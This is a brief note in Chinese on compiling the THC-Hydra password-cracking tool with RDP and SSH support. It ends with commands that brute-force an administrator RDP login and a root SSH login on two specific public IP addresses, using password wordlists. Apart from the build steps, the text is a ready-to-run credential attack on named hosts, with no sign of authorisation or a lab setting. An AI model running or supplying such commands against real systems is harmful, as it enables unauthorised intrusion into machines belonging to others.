Hydra
为了编译rdp模块,需要安装freerdp
sudo apt install freerdp2-dev -y
sudo apt install libssh-dev -y
编译安装hydra
git clone https://github.com/vanhauser-thc/thc-hydra.git ./configure make make install
rdp爆破
hydra 121.42.12.114 rdp -l administrator -P 3389passwd.txt -V
ssh
hydra 164.92.217.201 ssh -l root -P 字典自用版.txt -V